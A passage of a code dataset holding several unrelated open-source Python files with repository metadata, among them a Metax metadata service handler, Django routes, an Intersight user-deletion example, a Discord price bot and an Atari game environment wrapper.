error from Metax\n # \"\"\"\n # LOG.info(\"Updating collection: %r object data to Metax service.\", collection)\n # await self.check_connection()\n # metax_dataset = self.minimal_dataset_template\n # metax_dataset[\"metadata_provider_user\"] = external_id\n # if collection == \"dataset\":\n # dataset_data = self.create_metax_dataset_data_from_dataset(data)\n # else:\n # dataset_data = self.create_metax_dataset_data_from_study(data)\n # metax_dataset[\"research_dataset\"] = dataset_data\n #\n # metax_data = await self._put(data[\"metaxIdentifier\"], metax_dataset)\n # LOG.debug(\"Updated metax ID: %r, new metadata is: %r\", data[\"metaxIdentifier\"], metax_data)\n #\n # async def delete_draft_dataset(self, metax_id: str) -> None:\n # \"\"\"Delete draft dataset from Metax service.\n #\n # :param metax_id: Identification string pointing to Metax dataset to be deleted\n # \"\"\"\n # LOG.info(\"Deleting Metax draft dataset metax ID: %r\", metax_id)\n # await self._delete_draft(metax_id)\n\n async def update_dataset_with_doi_info(\n self, datacite_info: dict[str, Any], metax_ids: list[dict[str, Any]]\n ) -> None:\n \"\"\"Update dataset for publishing.\n\n :param datacite_info: Dict containing info to complete metax dataset metadata\n :param metax_ids: List of Metax id of dataset to be updated\n :raises: HTTPBadRequest if mapping datacite info to metax fails\n \"\"\"\n LOG.info(\n \"Updating metadata with datacite info for Metax datasets: %r\",\n \",\".join([id[\"metaxIdentifier\"] for id in metax_ids]),\n )\n bulk_data = []\n for metax_id in metax_ids:\n metax_data: dict[str, Any] = await self._get(metax_id[\"metaxIdentifier\"])\n\n # Map fields from doi info to Metax schema\n mapper = MetaDataMapper(metax_id[\"schema\"], metax_data[\"research_dataset\"], datacite_info)\n try:\n mapped_metax_data = mapper.map_metadata()\n except SubjectNotFoundException as error:\n # in case the datacite subject cannot be mapped to metax field of science\n reason = f\"{error}\"\n LOG.exception(reason)\n raise web.HTTPBadRequest(reason=reason)\n\n bulk_data.append({\"identifier\": metax_id[\"metaxIdentifier\"], \"research_dataset\": mapped_metax_data})\n\n await self._bulk_patch(bulk_data)\n\n async def update_draft_dataset_description(self, metax_id: str, description: str) -> None:\n \"\"\"Update the description of the draft dataset.\n\n :param metax_id: metax dataset id\n :param description: New description\n :raises: HTTPError depending on returned error from Metax\n \"\"\"\n LOG.info(\"Updating the description of Metax ID: %r.\", metax_id)\n data = await self._get(metax_id)\n data[\"research_dataset\"][\"description\"][\"en\"] = description\n metax_data = await self._put(metax_id, data)\n LOG.debug(\"Updated description of Metax ID: %r, new metadata is: %r\", metax_id, metax_data)\n\n async def publish_dataset(self, metax_ids: list[dict[str, Any]]) -> None:\n \"\"\"Publish draft dataset to Metax service.\n\n Iterate over the metax ids that need to be published.\n\n :param metax_ids: List of metax IDs that include study and datasets\n \"\"\"\n LOG.info(\"Publishing Metax datasets: %s\", \",\".join([id[\"metaxIdentifier\"] for id in metax_ids]))\n\n for obj in metax_ids:\n metax_id = obj[\"metaxIdentifier\"]\n doi = obj[\"doi\"]\n preferred_id = await self._publish(metax_id)\n\n if doi != preferred_id:\n LOG.warning(\"Metax Preferred Identifier: %r does not match object's DOI: %r.\", preferred_id, doi)\n LOG.debug(\n \"Object with Metax ID: %r and DOI: %r is published to Metax service.\",\n obj[\"metaxIdentifier\"],\n obj[\"doi\"],\n )\n\n def create_metax_dataset_data_from_study(self, data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Construct Metax dataset's research dataset dictionary from Submitters Study.\n\n :param data: Study data\n :returns: Constructed research dataset\n \"\"\"\n research_dataset: dict[str, Any] = self.minimal_dataset_template[\"research_dataset\"]\n research_dataset[\"preferred_identifier\"] = data[\"doi\"]\n research_dataset[\"title\"][\"en\"] = data[\"descriptor\"][\"studyTitle\"]\n research_dataset[\"description\"][\"en\"] = data[\"descriptor\"][\"studyAbstract\"]\n LOG.debug(\"Created Metax dataset from Study with data: %r\", research_dataset)\n return research_dataset\n\n def create_metax_dataset_data_from_dataset(self, data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Construct Metax dataset's research dataset dictionary from Submitters Dataset.\n\n :param data: Dataset data\n :returns: constructed research dataset\n \"\"\"\n research_dataset: dict[str, Any] = self.minimal_dataset_template[\"research_dataset\"]\n research_dataset[\"preferred_identifier\"] = data[\"doi\"]\n research_dataset[\"title\"][\"en\"] = data[\"title\"]\n research_dataset[\"description\"][\"en\"] = data[\"description\"]\n LOG.debug(\"Created Metax dataset from Dataset with data: %r\", research_dataset)\n return research_dataset\n\n async def _healtcheck(self) -> dict[str, str]:\n \"\"\"Check Metax service health.\n\n This responds with pong, when pinged.\n\n :returns: Dict with status of the datacite status\n \"\"\"\n try:\n start = time.time()\n async with self._client.request(\n method=\"GET\",\n url=f\"{URL(metax_config['url'])}/watchman/ping/\",\n timeout=10,\n ) as response:\n LOG.debug(\"Metax REST API status is: %s.\", response.status)\n content = await response.text()\n if response.status == 200 and content == \"pong\":\n status = \"Ok\" if (time.time() - start) < 1000 else \"Degraded\"\n else:\n status = \"Down\"\n\n return {\"status\": status}\n except ClientConnectorError as e:\n LOG.exception(\"Metax REST API is down with error: %r.\", e)\n return {\"status\": \"Down\"}\n except InvalidURL as e:\n LOG.exception(\"Metax REST API status retrieval failed with: %r.\", e)\n return {\"status\": \"Error\"}\n except web.HTTPError as e:\n LOG.exception(\"Metax REST API status retrieval failed with: %r.\", e)\n return {\"status\": \"Error\"}\n", "repo_name": "CSCfi/metadata-submitter", "sub_path": "metadata_backend/services/metax_service_handler.py", "file_name": "metax_service_handler.py", "file_ext": "py", "file_size_in_byte": 14440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "service_handler.ServiceHandler", "line_number": 19, "usage_type": "name"}, {"api_name": "yarl.URL", "line_number": 32, "usage_type": "call"}, {"api_name": "conf.conf.metax_config", "line_number": 32, "usage_type": "name"}, {"api_name": "conf.conf.metax_config", "line_number": 34, "usage_type": "name"}, {"api_name": "aiohttp.BasicAuth", "line_number": 35, "usage_type": "call"}, {"api_name": "conf.conf.metax_config", "line_number": 35, "usage_type": "name"}, {"api_name": "conf.conf.metax_config", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 41, "usage_type": "name"}, {"api_name": "conf.conf.metax_config", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 69, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 70, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 80, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 81, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 81, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 85, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 92, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 93, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 93, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 104, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 105, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 105, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 115, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 116, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 134, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 137, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 142, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 154, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 154, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 169, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 169, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 178, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 215, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 223, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 223, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 229, "usage_type": "name"}, {"api_name": "metax_mapper.MetaDataMapper", "line_number": 232, "usage_type": "call"}, {"api_name": "metax_mapper.SubjectNotFoundException", "line_number": 235, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 238, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 238, "usage_type": "name"}, {"api_name": "aiohttp.web.HTTPBadRequest", "line_number": 239, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 239, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 252, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 252, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 256, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 256, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 258, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 265, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 265, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.warning", "line_number": 273, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 273, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 274, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 280, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 286, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 290, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 290, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 293, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 299, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 303, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 303, "usage_type": "name"}, {"api_name": "time.time", "line_number": 314, "usage_type": "call"}, {"api_name": "yarl.URL", "line_number": 317, "usage_type": "call"}, {"api_name": "conf.conf.metax_config", "line_number": 317, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 320, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 320, "usage_type": "name"}, {"api_name": "time.time", "line_number": 323, "usage_type": "call"}, {"api_name": "aiohttp.client_exceptions.ClientConnectorError", "line_number": 328, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 329, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 329, "usage_type": "name"}, {"api_name": "aiohttp.client_exceptions.InvalidURL", "line_number": 331, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 332, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 332, "usage_type": "name"}, {"api_name": "aiohttp.web.HTTPError", "line_number": 334, "usage_type": "attribute"}, {"api_name": "aiohttp.web", "line_number": 334, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 335, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 335, "usage_type": "name"}]}
+{"seq_id": "73963340327", "text": "from django.contrib.auth.views import LogoutView\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.dashboard, name='homepage'),\n path('id/', views.dashboard_id, name='homepage_id'),\n path('login/', views.login_page, name='login'),\n path(\"logout/\", LogoutView.as_view(template_name='login.html'), name=\"logout\"),\n path('register/', views.register_page, name='register'),\n path('activate/', views.activate, name='activate'),\n]", "repo_name": "tomyhrdnsyh/Website-Gym-Member-Register", "sub_path": "dashboard/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}]}
+{"seq_id": "20974563468", "text": "#!/usr/bin/env python\n\"\"\"Delete an Intersight user by Cisco.com ID via the Intersight API.\"\"\"\nimport sys\nimport json\nimport argparse\nfrom intersight.intersight_api_client import IntersightApiClient\nfrom intersight.apis import iam_user_api\n\n\ndef delete_user(intersight_api_params, user_email):\n# Create Intersight API instance\n # ----------------------\n api_instance = IntersightApiClient(\n host=intersight_api_params['api_base_uri'],\n private_key=intersight_api_params['api_private_key_file'],\n api_key_id=intersight_api_params['api_key_id'],\n )\n\n try:\n # GET Users\n users_handle = iam_user_api.IamUserApi(api_instance)\n kwargs = dict(filter=\"Email eq '%s'\" % user_email)\n users_result = users_handle.iam_users_get(**kwargs)\n if users_result.results:\n # DELETE Users\n users_delete_result = users_handle.iam_users_moid_delete(moid=users_result.results[0].moid)\n else:\n print(\"User not found:\", user_email)\n\n except Exception as err:\n print(\"Exception:\", str(err))\n import traceback\n print('-' * 60)\n traceback.print_exc(file=sys.stdout)\n print('-' * 60)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--id', required=True, help='Cisco email ID of the user to delete')\n help_str = 'JSON file with Intersight API parameters. Default: intersight_api_params.json'\n parser.add_argument('-a', '--api_params', default='intersight_api_params.json', help=help_str)\n args = parser.parse_args()\n with open(args.api_params, 'r') as api_file:\n intersight_api_params = json.load(api_file)\n\n delete_user(intersight_api_params, args.id)\n\n sys.exit(0)\n", "repo_name": "CiscoUcs/intersight-python", "sub_path": "examples/delete_user.py", "file_name": "delete_user.py", "file_ext": "py", "file_size_in_byte": 1758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "53", "api": [{"api_name": "intersight.intersight_api_client.IntersightApiClient", "line_number": 13, "usage_type": "call"}, {"api_name": "intersight.apis.iam_user_api.IamUserApi", "line_number": 21, "usage_type": "call"}, {"api_name": "intersight.apis.iam_user_api", "line_number": 21, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 34, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 39, "usage_type": "call"}, {"api_name": "json.load", "line_number": 45, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "17441391104", "text": "from collections import deque\ndx=[-2,-1,2,1,2,1,-2,-1]\ndy=[1,2,1,2,-1,-2,-1,-2]\n\ndef bfs(sx,sy,ex,ey, l):\n visited = [[0] * l for _ in range(l)]\n q = deque()\n q.append([sx,sy])\n visited[sy][sx] = 1\n while bool(q):\n x, y = q.popleft()\n for i in range(8):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx=self.bound\n cond_y = abs(nextpoint[1])>=self.bound\n cond_z = abs(nextpoint[2])>=self.bound\n\n if cond_x or cond_y or cond_z:\n break\n\n self.points = np.vstack((self.points, nextpoint)) \n\n def save_to_vtk(self, fname, sep=\",\"):\n point_data = pyvtk.PointData(\\\n pyvtk.Vectors(self.u, name=\"u\"),\n pyvtk.Tensors(arr_to_tensor(self.F), name=\"F\"),\n pyvtk.Tensors(arr_to_tensor(self.C), name=\"C\"),\n pyvtk.Tensors(arr_to_tensor(self.R), name=\"R\"),\n pyvtk.Tensors(arr_to_tensor(self.U), name=\"U\"),\n pyvtk.Vectors(self.eigval, name=\"w\"),\n pyvtk.Tensors(arr_to_tensor(self.eigvec), name=\"v\"),\n pyvtk.Scalars(self.mu, name=\"mu\"),\n pyvtk.Scalars(self.stretches, \"stretches\")\n )\n\n # print(pyvtk.Tensors(3, \"3\"))\n\n vtk = pyvtk.VtkData(\\\n pyvtk.PolyData(self.points), \n point_data\n )\n\n vtk.tofile(fname) \n\n def calc_deformation(self):\n \n # Deformations\n super().calc_deformation()\n\n # Stretches\n npoints = self.points.shape[0]\n v = np.broadcast_to(self.direction, (npoints, 3))\n v = np.ascontiguousarray(v)\n v = v.reshape((-1, 3, 1))\n\n self.stretches = np.matmul(v.transpose(0, 2, 1), np.matmul(self.C, v)) ** 0.5\n self.stretches = self.stretches.flatten()\n\n def assemble_df(self):\n super().assemble_df()\n self.df[\"stretches\"] = self.stretches\n\n\n", "repo_name": "jdsteinman/Gel-Model", "sub_path": "bar/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 12505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.asarray", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.ndim", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "call"}, {"api_name": "pyvtk.PointData", "line_number": 148, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 149, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 150, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 151, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 152, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 153, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 154, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 155, "usage_type": "call"}, {"api_name": "pyvtk.Scalars", "line_number": 156, "usage_type": "call"}, {"api_name": "pyvtk.VtkData", "line_number": 160, "usage_type": "call"}, {"api_name": "pyvtk.PolyData", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "scipy.linalg.polar", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.hsplit", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.hsplit", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 354, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 355, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 365, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 380, "usage_type": "call"}, {"api_name": "pyvtk.PointData", "line_number": 383, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 384, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 385, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 386, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 387, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 388, "usage_type": "call"}, {"api_name": "pyvtk.Vectors", "line_number": 389, "usage_type": "call"}, {"api_name": "pyvtk.Tensors", "line_number": 390, "usage_type": "call"}, {"api_name": "pyvtk.Scalars", "line_number": 391, "usage_type": "call"}, {"api_name": "pyvtk.Scalars", "line_number": 392, "usage_type": "call"}, {"api_name": "pyvtk.VtkData", "line_number": 397, "usage_type": "call"}, {"api_name": "pyvtk.PolyData", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.broadcast_to", "line_number": 411, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 412, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 415, "usage_type": "call"}]}
+{"seq_id": "9297894862", "text": "\"\"\"\nCommand-Line interface functionality for synchronization\n\"\"\"\nimport json\nimport argparse\nimport cattr\nfrom nowcastlib.pipeline.structs import config\nfrom nowcastlib.pipeline import sync\n\n\ndef configure_parser(action_object):\n \"\"\"Configures the subparser for our preprocess command\"\"\"\n sparser = action_object.add_parser(\n \"sync\",\n description=\"Synchronize datasets\",\n help=\"Run `nowcastlib sync -h` for further help\",\n formatter_class=argparse.HelpFormatter,\n )\n sparser.add(\n \"-c\",\n \"--config\",\n required=True,\n help=\"path to JSON file following the DataSet format. See docs for available fields\",\n )\n\n\ndef run(args):\n \"\"\"runs appropriate function based on provided cli args\"\"\"\n with open(args.config) as json_file:\n options = json.load(json_file)\n cattr_cnvrtr = cattr.GenConverter(forbid_extra_keys=True)\n dataset_config = cattr_cnvrtr.structure(options, config.DataSet)\n return sync.synchronize_dataset(dataset_config)\n", "repo_name": "thesofakillers/nowcastlib", "sub_path": "nowcastlib/pipeline/sync/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 1020, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.HelpFormatter", "line_number": 17, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 30, "usage_type": "call"}, {"api_name": "cattr.GenConverter", "line_number": 31, "usage_type": "call"}, {"api_name": "nowcastlib.pipeline.structs.config.DataSet", "line_number": 32, "usage_type": "attribute"}, {"api_name": "nowcastlib.pipeline.structs.config", "line_number": 32, "usage_type": "name"}, {"api_name": "nowcastlib.pipeline.sync.synchronize_dataset", "line_number": 33, "usage_type": "call"}, {"api_name": "nowcastlib.pipeline.sync", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "33674957269", "text": "import hikari\nimport requests\nimport os\nfrom dotenv import load_dotenv\nfrom nft import fetcher\nfrom crypto import coinFetcher\nfrom stocks import stockFetcher, afterHoursFetcher\nload_dotenv(override=False)\ndiscord_token = os.environ.get('TOKEN')\nadmin_token=os.environ.get('ADMIN')\n\n\n#intent\nbot = hikari.GatewayBot(\n discord_token,\n intents=hikari.Intents.ALL_UNPRIVILEGED # Add this\n | hikari.Intents.MESSAGE_CONTENT, # \n)\n\n\n@bot.listen()\nasync def ping(event: hikari.GuildMessageCreateEvent) -> None:\n if event.content and event.content.startswith(\"t\") and event.content[1] == \" \":\n message = (event.content[2:]).upper()\n coins = message.split(\" \")\n response = \"\"\n for coin in coins:\n price = coinFetcher(coin)\n response += f\"**{coin}**: ${price}\\n\"\n await event.message.respond(response)\n \n if event.content and event.content.startswith(\"p\") and event.content[1] == \" \":\n message = (event.content[2:]).upper()\n stocks = message.split()\n for stock in stocks:\n embed = stockFetcher(stock, event.message)\n await event.message.respond(embed=embed)\n\n if event.content and event.content.startswith(\"pa\") and event.content[2] == \" \":\n message = (event.content[3:]).upper()\n stocks = message.split()\n for stock in stocks:\n embed = afterHoursFetcher(stock, event.message)\n await event.message.respond(embed=embed)\n\nbot.run()\n", "repo_name": "Jckhe/Jack-Bot", "sub_path": "jackbot.py", "file_name": "jackbot.py", "file_ext": "py", "file_size_in_byte": 1491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "hikari.GatewayBot", "line_number": 14, "usage_type": "call"}, {"api_name": "hikari.Intents", "line_number": 16, "usage_type": "attribute"}, {"api_name": "hikari.Intents", "line_number": 17, "usage_type": "attribute"}, {"api_name": "hikari.GuildMessageCreateEvent", "line_number": 22, "usage_type": "attribute"}, {"api_name": "crypto.coinFetcher", "line_number": 28, "usage_type": "call"}, {"api_name": "stocks.stockFetcher", "line_number": 36, "usage_type": "call"}, {"api_name": "stocks.afterHoursFetcher", "line_number": 43, "usage_type": "call"}]}
+{"seq_id": "9468537762", "text": "import sys\nimport os\nfrom ale_python_interface import ALEInterface\nimport cv2\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass Environment:\n def __init__(self, rom_file, args):\n self.ale = ALEInterface()\n if args.display_screen:\n if sys.platform == 'darwin':\n import pygame\n pygame.init()\n self.ale.setBool('sound', False) # Sound doesn't work on OSX\n elif sys.platform.startswith('linux'):\n self.ale.setBool('sound', True)\n self.ale.setBool('display_screen', True)\n\n self.ale.setInt('frame_skip', args.frame_skip)\n self.ale.setFloat('repeat_action_probability', args.repeat_action_probability)\n self.ale.setBool('color_averaging', args.color_averaging)\n\n if args.random_seed:\n self.ale.setInt('random_seed', args.random_seed)\n\n if args.record_screen_path:\n if not os.path.exists(args.record_screen_path):\n logger.info(\"Creating folder %s\" % args.record_screen_path)\n os.makedirs(args.record_screen_path)\n logger.info(\"Recording screens to %s\", args.record_screen_path)\n self.ale.setString('record_screen_dir', args.record_screen_path)\n\n if args.record_sound_filename:\n logger.info(\"Recording sound to %s\", args.record_sound_filename)\n self.ale.setBool('sound', True)\n self.ale.setString('record_sound_filename', args.record_sound_filename)\n\n self.ale.loadROM(rom_file)\n\n if args.minimal_action_set:\n self.actions = self.ale.getMinimalActionSet()\n logger.info(\"Using minimal action set with size %d\" % len(self.actions))\n else:\n self.actions = self.ale.getLegalActionSet()\n logger.info(\"Using full action set with size %d\" % len(self.actions))\n logger.debug(\"Actions: \" + str(self.actions))\n\n self.dims = (args.screen_height, args.screen_width)\n\n def numActions(self):\n return len(self.actions)\n\n def restart(self):\n self.ale.reset_game()\n\n def act(self, action):\n reward = self.ale.act(self.actions[action])\n return reward\n\n def getScreen(self):\n screen = self.ale.getScreenGrayscale()\n resized = cv2.resize(screen, self.dims)\n return resized\n\n def isTerminal(self):\n return self.ale.game_over()\n", "repo_name": "rickyHong/simple_dqn", "sub_path": "src/environment.py", "file_name": "environment.py", "file_ext": "py", "file_size_in_byte": 2188, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "ale_python_interface.ALEInterface", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.platform.startswith", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.makedirs", 